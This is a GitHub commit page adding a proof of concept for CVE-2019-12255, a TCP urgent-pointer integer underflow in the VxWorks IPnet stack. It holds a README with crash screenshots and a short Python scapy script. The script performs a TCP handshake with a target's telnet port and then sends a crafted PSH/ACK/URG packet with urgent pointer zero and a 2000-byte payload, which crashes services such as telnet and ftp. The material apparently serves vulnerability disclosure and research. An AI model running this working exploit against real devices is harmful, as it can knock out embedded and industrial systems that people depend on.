Skip to content

Commit

Permalink
Browse files Browse the repository at this point in the history
  • Loading branch information
xzz authored and xzz committed Aug 11, 2019
1 parent 5e9c273 commit 9c6e603
Showing 4 changed files with 30 additions and 0 deletions.
11 changes: 11 additions & 0 deletions CVE-2019-12255/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
## CVE-2019-12255
VxWorks TCP Urgent pointer = 0 integer underflow

## Discovered By
Armis Security

## Vulnerability Summary
The vulnerability exists in the IPnet stack of VxWorks. The details of the vulnerability can be found [here](https://i.blackhat.com/USA-19/Thursday/us-19-Seri-Critical-Zero-Days-Remotely-Compromise-The-Most-Popular-Real-Time-OS-wp.pdf). The PoC can crash VxWorks tasks(set the port corresponding to the task in the PoC), such as telnet, ftp, etc.
![ftp crash](crash_ftp.png)

![telnet crash](crash_telnet.png)
Binary file added CVE-2019-12255/crash_ftp.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added CVE-2019-12255/crash_telnet.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
19 changes: 19 additions & 0 deletions CVE-2019-12255/poc.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,19 @@
from scapy.all import *

if __name__ == "__main__":
ip = "192.168.10.199"
dport = 23
seq_num = 1000
payload = "\x42"*2000
sport = random.randint(1024,65535)

syn = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "S", seq=seq_num)
syn_ack = sr1(syn)

seq_num = seq_num + 1
ack_num = syn_ack.seq+1
ack = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "A", seq=seq_num, ack=ack_num)
send(ack)

psh = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "PAU", seq=seq_num, ack=ack_num, urgptr=0) / payload
send(psh)

0 comments on commit 9c6e603

Please sign in to comment.